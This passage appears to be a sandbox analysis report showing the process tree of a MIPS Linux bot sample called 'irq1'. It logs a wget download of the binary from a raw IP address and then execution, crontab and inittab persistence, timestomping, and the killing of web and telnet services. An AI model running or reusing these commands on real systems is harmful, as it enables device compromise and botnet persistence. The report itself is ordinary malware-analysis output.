          • irq0 New Fork (PID: 9001, Parent: 8487)
          • irq0 New Fork (PID: 9004, Parent: 8487)
          • irq0 New Fork (PID: 9444, Parent: 8487)
          • irq0 New Fork (PID: 9446, Parent: 8487)
          • irq0 New Fork (PID: 9447, Parent: 8487)
          • irq0 New Fork (PID: 9448, Parent: 8487)
          • irq0 New Fork (PID: 9449, Parent: 8487)
          • irq0 New Fork (PID: 9453, Parent: 8487)
          • irq0 New Fork (PID: 9455, Parent: 8487)
          • irq0 New Fork (PID: 9458, Parent: 8487)
          • irq0 New Fork (PID: 9460, Parent: 8487)
          • irq0 New Fork (PID: 9461, Parent: 8487)
          • irq0 New Fork (PID: 9463, Parent: 8487)
          • irq0 New Fork (PID: 9466, Parent: 8487)
          • irq0 New Fork (PID: 9467, Parent: 8487)
          • irq0 New Fork (PID: 9470, Parent: 8487)
          • irq0 New Fork (PID: 9472, Parent: 8487)
          • irq0 New Fork (PID: 9473, Parent: 8487)
          • irq0 New Fork (PID: 9474, Parent: 8487)
          • irq0 New Fork (PID: 9478, Parent: 8487)
          • irq0 New Fork (PID: 9479, Parent: 8487)
          • irq0 New Fork (PID: 9482, Parent: 8487)
          • irq0 New Fork (PID: 9484, Parent: 8487)
          • irq0 New Fork (PID: 9486, Parent: 8487)
          • irq0 New Fork (PID: 9488, Parent: 8487)
          • irq0 New Fork (PID: 9490, Parent: 8487)
          • irq0 New Fork (PID: 9492, Parent: 8487)
          • irq0 New Fork (PID: 9494, Parent: 8487)
          • irq0 New Fork (PID: 9496, Parent: 8487)
          • irq0 New Fork (PID: 9497, Parent: 8487)
          • irq0 New Fork (PID: 9500, Parent: 8487)
          • irq0 New Fork (PID: 9501, Parent: 8487)
          • irq0 New Fork (PID: 9504, Parent: 8487)
          • irq0 New Fork (PID: 9506, Parent: 8487)
          • irq0 New Fork (PID: 9508, Parent: 8487)
          • irq0 New Fork (PID: 9509, Parent: 8487)
          • irq0 New Fork (PID: 9512, Parent: 8487)
          • irq0 New Fork (PID: 9514, Parent: 8487)
          • irq0 New Fork (PID: 9515, Parent: 8487)
          • irq0 New Fork (PID: 9518, Parent: 8487)
          • irq0 New Fork (PID: 9520, Parent: 8487)
          • irq0 New Fork (PID: 9522, Parent: 8487)
          • irq0 New Fork (PID: 9524, Parent: 8487)
          • irq0 New Fork (PID: 9526, Parent: 8487)
          • irq0 New Fork (PID: 9528, Parent: 8487)
          • irq0 New Fork (PID: 9529, Parent: 8487)
          • irq0 New Fork (PID: 9532, Parent: 8487)
          • irq0 New Fork (PID: 9533, Parent: 8487)
          • irq0 New Fork (PID: 9536, Parent: 8487)
          • irq0 New Fork (PID: 9537, Parent: 8487)
          • irq0 New Fork (PID: 9539, Parent: 8487)
          • irq0 New Fork (PID: 9541, Parent: 8487)
          • irq0 New Fork (PID: 9544, Parent: 8487)
          • irq0 New Fork (PID: 9546, Parent: 8487)
          • irq0 New Fork (PID: 9548, Parent: 8487)
          • irq0 New Fork (PID: 9549, Parent: 8487)
          • irq0 New Fork (PID: 9552, Parent: 8487)
          • irq0 New Fork (PID: 9554, Parent: 8487)
          • irq0 New Fork (PID: 9555, Parent: 8487)
          • irq0 New Fork (PID: 9557, Parent: 8487)
          • irq0 New Fork (PID: 9560, Parent: 8487)
          • irq0 New Fork (PID: 9562, Parent: 8487)
          • irq0 New Fork (PID: 9563, Parent: 8487)
          • irq0 New Fork (PID: 9565, Parent: 8487)
          • irq0 New Fork (PID: 9568, Parent: 8487)
          • irq0 New Fork (PID: 9570, Parent: 8487)
          • irq0 New Fork (PID: 9572, Parent: 8487)
          • irq0 New Fork (PID: 9574, Parent: 8487)
          • irq0 New Fork (PID: 9575, Parent: 8487)
          • irq0 New Fork (PID: 9578, Parent: 8487)
          • irq0 New Fork (PID: 9579, Parent: 8487)
          • irq0 New Fork (PID: 9582, Parent: 8487)
          • irq0 New Fork (PID: 9584, Parent: 8487)
          • irq0 New Fork (PID: 9586, Parent: 8487)
          • irq0 New Fork (PID: 9588, Parent: 8487)
          • irq0 New Fork (PID: 9590, Parent: 8487)
          • irq0 New Fork (PID: 9592, Parent: 8487)
          • irq0 New Fork (PID: 9594, Parent: 8487)
          • irq0 New Fork (PID: 9596, Parent: 8487)
          • irq0 New Fork (PID: 9598, Parent: 8487)
          • irq0 New Fork (PID: 9600, Parent: 8487)
          • irq0 New Fork (PID: 9602, Parent: 8487)
          • irq0 New Fork (PID: 9604, Parent: 8487)
          • irq0 New Fork (PID: 9606, Parent: 8487)
          • irq0 New Fork (PID: 9608, Parent: 8487)
          • irq0 New Fork (PID: 9610, Parent: 8487)
          • irq0 New Fork (PID: 9612, Parent: 8487)
          • irq0 New Fork (PID: 9614, Parent: 8487)
          • irq0 New Fork (PID: 9616, Parent: 8487)
          • irq0 New Fork (PID: 9618, Parent: 8487)
          • irq0 New Fork (PID: 9620, Parent: 8487)
          • irq0 New Fork (PID: 9622, Parent: 8487)
          • irq0 New Fork (PID: 9623, Parent: 8487)
          • irq0 New Fork (PID: 9624, Parent: 8487)
          • irq0 New Fork (PID: 9628, Parent: 8487)
          • irq0 New Fork (PID: 9630, Parent: 8487)
          • irq0 New Fork (PID: 9632, Parent: 8487)
          • irq0 New Fork (PID: 9634, Parent: 8487)
          • irq0 New Fork (PID: 9636, Parent: 8487)
          • irq0 New Fork (PID: 9638, Parent: 8487)
          • irq0 New Fork (PID: 9640, Parent: 8487)
          • irq0 New Fork (PID: 9642, Parent: 8487)
          • irq0 New Fork (PID: 9644, Parent: 8487)
          • irq0 New Fork (PID: 9646, Parent: 8487)
          • irq0 New Fork (PID: 9648, Parent: 8487)
          • irq0 New Fork (PID: 9650, Parent: 8487)
          • irq0 New Fork (PID: 9652, Parent: 8487)
          • irq0 New Fork (PID: 9654, Parent: 8487)
          • irq0 New Fork (PID: 9656, Parent: 8487)
          • irq0 New Fork (PID: 9657, Parent: 8487)
          • irq0 New Fork (PID: 9659, Parent: 8487)
          • irq0 New Fork (PID: 9660, Parent: 8487)
          • irq0 New Fork (PID: 9663, Parent: 8487)
          • irq0 New Fork (PID: 9664, Parent: 8487)
          • irq0 New Fork (PID: 9665, Parent: 8487)
          • irq0 New Fork (PID: 9671, Parent: 8487)
          • irq0 New Fork (PID: 9672, Parent: 8487)
          • irq0 New Fork (PID: 9673, Parent: 8487)
          • irq0 New Fork (PID: 9674, Parent: 8487)
          • irq0 New Fork (PID: 9679, Parent: 8487)
          • irq0 New Fork (PID: 9680, Parent: 8487)
          • irq0 New Fork (PID: 9683, Parent: 8487)
          • irq0 New Fork (PID: 9684, Parent: 8487)
          • irq0 New Fork (PID: 9685, Parent: 8487)
          • irq0 New Fork (PID: 9686, Parent: 8487)
          • irq0 New Fork (PID: 9691, Parent: 8487)
          • irq0 New Fork (PID: 9693, Parent: 8487)
          • irq0 New Fork (PID: 9694, Parent: 8487)
          • irq0 New Fork (PID: 9695, Parent: 8487)
          • irq0 New Fork (PID: 9701, Parent: 8487)
          • irq0 New Fork (PID: 9702, Parent: 8487)
          • irq0 New Fork (PID: 9703, Parent: 8487)
          • irq0 New Fork (PID: 9707, Parent: 8487)
          • irq0 New Fork (PID: 9708, Parent: 8487)
          • irq0 New Fork (PID: 9709, Parent: 8487)
          • irq0 New Fork (PID: 9713, Parent: 8487)
          • irq0 New Fork (PID: 9715, Parent: 8487)
          • irq0 New Fork (PID: 9716, Parent: 8487)
          • irq0 New Fork (PID: 9719, Parent: 8487)
          • irq0 New Fork (PID: 9721, Parent: 8487)
          • irq0 New Fork (PID: 9723, Parent: 8487)
          • irq0 New Fork (PID: 9725, Parent: 8487)
          • irq0 New Fork (PID: 9727, Parent: 8487)
          • irq0 New Fork (PID: 9729, Parent: 8487)
          • irq0 New Fork (PID: 9731, Parent: 8487)
          • irq0 New Fork (PID: 9733, Parent: 8487)
          • irq0 New Fork (PID: 9735, Parent: 8487)
          • irq0 New Fork (PID: 9737, Parent: 8487)
          • irq0 New Fork (PID: 9739, Parent: 8487)
          • irq0 New Fork (PID: 9740, Parent: 8487)
          • irq0 New Fork (PID: 9742, Parent: 8487)
          • irq0 New Fork (PID: 9744, Parent: 8487)
          • irq0 New Fork (PID: 9747, Parent: 8487)
          • irq0 New Fork (PID: 9749, Parent: 8487)
          • irq0 New Fork (PID: 9751, Parent: 8487)
          • irq0 New Fork (PID: 9753, Parent: 8487)
          • irq0 New Fork (PID: 9755, Parent: 8487)
          • irq0 New Fork (PID: 9757, Parent: 8487)
          • irq0 New Fork (PID: 9759, Parent: 8487)
          • irq0 New Fork (PID: 9761, Parent: 8487)
    • sh New Fork (PID: 5283, Parent: 4580)
    • wget (PID: 5283, Parent: 4580, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/irq1 -O irq1
    • sh New Fork (PID: 5974, Parent: 4580)
    • chmod (PID: 5974, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x irq1
    • sh New Fork (PID: 5977, Parent: 4580)
    • chmod (PID: 5977, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 irq1
    • sh New Fork (PID: 5978, Parent: 4580)
    • irq1 (PID: 5978, Parent: 4580, MD5: unknown) Arguments: /usr/bin/qemu-mips ./irq1
      • irq1 New Fork (PID: 6069, Parent: 5978)
      • sh (PID: 6069, Parent: 5978, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "chmod 700 /tmp/irq1 > /dev/null 2>&1 &"
        • sh New Fork (PID: 6078, Parent: 6069)
        • chmod (PID: 6078, Parent: 3310, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /tmp/irq1
      • irq1 New Fork (PID: 6079, Parent: 5978)
      • sh (PID: 6079, Parent: 5978, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /tmp/irq1"
        • sh New Fork (PID: 6098, Parent: 6079)
        • touch (PID: 6098, Parent: 6079, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /tmp/irq1
      • irq1 New Fork (PID: 6103, Parent: 5978)
      • sh (PID: 6103, Parent: 5978, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "(crontab -l | grep -v \"/tmp/irq1\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
        • sh New Fork (PID: 6113, Parent: 6103)
          • sh New Fork (PID: 6118, Parent: 6113)
          • crontab (PID: 6118, Parent: 6113, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -l
          • sh New Fork (PID: 6119, Parent: 6113)
          • grep (PID: 6119, Parent: 6113, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/irq1
          • sh New Fork (PID: 6120, Parent: 6113)
          • grep (PID: 6120, Parent: 6113, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v "no cron"
          • sh New Fork (PID: 6121, Parent: 6113)
          • grep (PID: 6121, Parent: 6113, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v lesshts/run.sh
      • irq1 New Fork (PID: 6154, Parent: 5978)
      • sh (PID: 6154, Parent: 5978, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"* * * * * /tmp/irq1 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
      • irq1 New Fork (PID: 6165, Parent: 5978)
      • sh (PID: 6165, Parent: 5978, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "crontab /var/run/.x00740882966"
        • sh New Fork (PID: 6170, Parent: 6165)
        • crontab (PID: 6170, Parent: 6165, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab /var/run/.x00740882966
      • irq1 New Fork (PID: 6184, Parent: 5978)
      • sh (PID: 6184, Parent: 5978, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/.x00740882966"
        • sh New Fork (PID: 6212, Parent: 6184)
        • rm (PID: 6212, Parent: 6184, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/.x00740882966
      • irq1 New Fork (PID: 6218, Parent: 5978)
      • sh (PID: 6218, Parent: 5978, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /etc/inittab | grep -v \"/tmp/irq1\" > /etc/inittab2"
        • sh New Fork (PID: 6230, Parent: 6218)
        • cat (PID: 6230, Parent: 6218, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /etc/inittab
        • sh New Fork (PID: 6231, Parent: 6218)
        • grep (PID: 6231, Parent: 6218, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/irq1
      • irq1 New Fork (PID: 6249, Parent: 5978)
      • sh (PID: 6249, Parent: 5978, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"0:2345:respawn:/tmp/irq1\" >> /etc/inittab2"
      • irq1 New Fork (PID: 6256, Parent: 5978)
      • sh (PID: 6256, Parent: 5978, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 6265, Parent: 6256)
        • cat (PID: 6265, Parent: 6256, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /etc/inittab2
      • irq1 New Fork (PID: 6266, Parent: 5978)
      • sh (PID: 6266, Parent: 5978, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 6268, Parent: 6266)
        • rm (PID: 6268, Parent: 6266, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /etc/inittab2
      • irq1 New Fork (PID: 6271, Parent: 5978)
      • sh (PID: 6271, Parent: 5978, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 6303, Parent: 6271)
        • touch (PID: 6303, Parent: 6271, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /etc/inittab
      • irq1 New Fork (PID: 6305, Parent: 5978)
        • irq1 New Fork (PID: 6310, Parent: 6305)
        • sh (PID: 6310, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 6320, Parent: 6310)
          • uname (PID: 6320, Parent: 6310, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq1 New Fork (PID: 6321, Parent: 6305)
        • sh (PID: 6321, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 6341, Parent: 6321)
          • uname (PID: 6341, Parent: 6321, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq1 New Fork (PID: 6344, Parent: 6305)
        • sh (PID: 6344, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 6347, Parent: 6344)
          • uname (PID: 6347, Parent: 6344, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq1 New Fork (PID: 7189, Parent: 6305)
        • sh (PID: 7189, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 7191, Parent: 7189)
            • sh New Fork (PID: 7192, Parent: 7191)
            • cat (PID: 7192, Parent: 7191, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/httpd.pid
        • irq1 New Fork (PID: 7193, Parent: 6305)
        • sh (PID: 7193, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service httpd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 7195, Parent: 7193)
          • service (PID: 7195, Parent: 3310, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service httpd stop
            • service New Fork (PID: 7232, Parent: 7195)
            • basename (PID: 7232, Parent: 7195, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7239, Parent: 7195)
            • basename (PID: 7239, Parent: 7195, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7268, Parent: 7195)
            • systemctl (PID: 7268, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 7308, Parent: 7195)
              • service New Fork (PID: 7311, Parent: 7308)
              • systemctl (PID: 7311, Parent: 7308, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 7312, Parent: 7308)
              • sed (PID: 7312, Parent: 7308, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 7558, Parent: 7195)
            • systemctl (PID: 7558, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 7599, Parent: 7195)
            • systemctl (PID: 7599, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 7615, Parent: 7195)
            • systemctl (PID: 7615, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 7634, Parent: 7195)
            • systemctl (PID: 7634, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 7669, Parent: 7195)
            • systemctl (PID: 7669, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 7696, Parent: 7195)
            • systemctl (PID: 7696, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 7722, Parent: 7195)
            • systemctl (PID: 7722, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 7730, Parent: 7195)
            • systemctl (PID: 7730, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 7776, Parent: 7195)
            • systemctl (PID: 7776, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 7792, Parent: 7195)
            • systemctl (PID: 7792, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 7820, Parent: 7195)
            • systemctl (PID: 7820, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 7841, Parent: 7195)
            • systemctl (PID: 7841, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 7881, Parent: 7195)
            • systemctl (PID: 7881, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 7895, Parent: 7195)
            • systemctl (PID: 7895, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 7938, Parent: 7195)
            • systemctl (PID: 7938, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 7951, Parent: 7195)
            • systemctl (PID: 7951, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 7976, Parent: 7195)
            • systemctl (PID: 7976, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 8011, Parent: 7195)
            • systemctl (PID: 8011, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 8038, Parent: 7195)
            • systemctl (PID: 8038, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 8073, Parent: 7195)
            • systemctl (PID: 8073, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 8092, Parent: 7195)
            • systemctl (PID: 8092, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 8119, Parent: 7195)
            • systemctl (PID: 8119, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 8136, Parent: 7195)
            • systemctl (PID: 8136, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 8173, Parent: 7195)
            • systemctl (PID: 8173, Parent: 7195, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 7195, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop httpd.service
        • irq1 New Fork (PID: 7197, Parent: 6305)
        • sh (PID: 7197, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7235, Parent: 7197)
          • killall (PID: 7235, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 mini_httpd
        • irq1 New Fork (PID: 7236, Parent: 6305)
        • sh (PID: 7236, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7261, Parent: 7236)
          • killall (PID: 7261, Parent: 7236, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 minihttpd
        • irq1 New Fork (PID: 7265, Parent: 6305)
        • sh (PID: 7265, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 7302, Parent: 7265)
            • sh New Fork (PID: 7304, Parent: 7302)
            • cat (PID: 7304, Parent: 7302, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/thttpd.pid
        • irq1 New Fork (PID: 7303, Parent: 6305)
        • sh (PID: 7303, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
        • irq1 New Fork (PID: 7307, Parent: 6305)
        • sh (PID: 7307, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "nvram set http_enable=0 > /dev/null 2>&1"
        • irq1 New Fork (PID: 7326, Parent: 6305)
        • sh (PID: 7326, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 httpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7358, Parent: 7326)
          • killall (PID: 7358, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 httpd
        • irq1 New Fork (PID: 7361, Parent: 6305)
        • sh (PID: 7361, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service telnetd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 7380, Parent: 7361)
          • service (PID: 7380, Parent: 3310, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service telnetd stop
            • service New Fork (PID: 7384, Parent: 7380)
            • basename (PID: 7384, Parent: 7380, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7390, Parent: 7380)
            • basename (PID: 7390, Parent: 7380, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7414, Parent: 7380)
            • systemctl (PID: 7414, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 7560, Parent: 7380)
              • service New Fork (PID: 7564, Parent: 7560)
              • systemctl (PID: 7564, Parent: 7560, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 7565, Parent: 7560)
              • sed (PID: 7565, Parent: 7560, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 7632, Parent: 7380)
            • systemctl (PID: 7632, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 7635, Parent: 7380)
            • systemctl (PID: 7635, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 7670, Parent: 7380)
            • systemctl (PID: 7670, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 7697, Parent: 7380)
            • systemctl (PID: 7697, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 7724, Parent: 7380)
            • systemctl (PID: 7724, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 7764, Parent: 7380)
            • systemctl (PID: 7764, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 7785, Parent: 7380)
            • systemctl (PID: 7785, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 7813, Parent: 7380)
            • systemctl (PID: 7813, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 7840, Parent: 7380)
            • systemctl (PID: 7840, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 7865, Parent: 7380)
            • systemctl (PID: 7865, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 7894, Parent: 7380)
            • systemctl (PID: 7894, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 7903, Parent: 7380)
            • systemctl (PID: 7903, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 7940, Parent: 7380)
            • systemctl (PID: 7940, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 7975, Parent: 7380)
            • systemctl (PID: 7975, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 8010, Parent: 7380)
            • systemctl (PID: 8010, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 8037, Parent: 7380)
            • systemctl (PID: 8037, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 8061, Parent: 7380)
            • systemctl (PID: 8061, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 8091, Parent: 7380)
            • systemctl (PID: 8091, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 8118, Parent: 7380)
            • systemctl (PID: 8118, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 8127, Parent: 7380)
            • systemctl (PID: 8127, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 8172, Parent: 7380)
            • systemctl (PID: 8172, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 8175, Parent: 7380)
            • systemctl (PID: 8175, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 8245, Parent: 7380)
            • systemctl (PID: 8245, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 8263, Parent: 7380)
